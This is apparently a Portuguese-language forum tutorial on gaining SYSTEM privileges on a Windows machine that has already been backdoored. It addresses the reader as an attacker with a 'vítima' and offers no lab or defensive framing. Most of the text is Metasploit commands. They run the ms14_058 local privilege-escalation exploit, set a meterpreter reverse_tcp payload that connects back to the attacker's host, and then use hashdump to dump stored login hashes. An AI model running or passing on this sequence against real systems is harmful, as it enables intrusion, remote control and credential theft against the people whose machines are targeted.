Descrição
Neste tutorial vou ensinar vocês a obterem privilégios para seu backdoor
Vou pular a parte de criar o payload mandar para vítima e fazer a conexão e vou direto ao ponto
Qundo já tiver a sessão deixe ela lá em background e vamos usar um módulo
Código: Selecionar todos
use exploit/windows/local/ms14_058_track_popup_menu
Vamos setar a sessão
Código: Selecionar todos
set SESSION 1
Sete o host
Código: Selecionar todos
set LHOST seuhost
Sete a porta
Código: Selecionar todos
set LPORT suaporta
Sete o payload
Código: Selecionar todos
set PAYLOAD windows/meterpreter/reverse_tcp
Após isso vamos exploitar, e o módulo irá carregar na sessão 1
Código: Selecionar todos
exploit
Você iniciará no shell como autoridade do sistema tendo acesso total a ele
Para dumpar os logins do sistema executamos
Código: Selecionar todos
run post/windows/gather/hashdump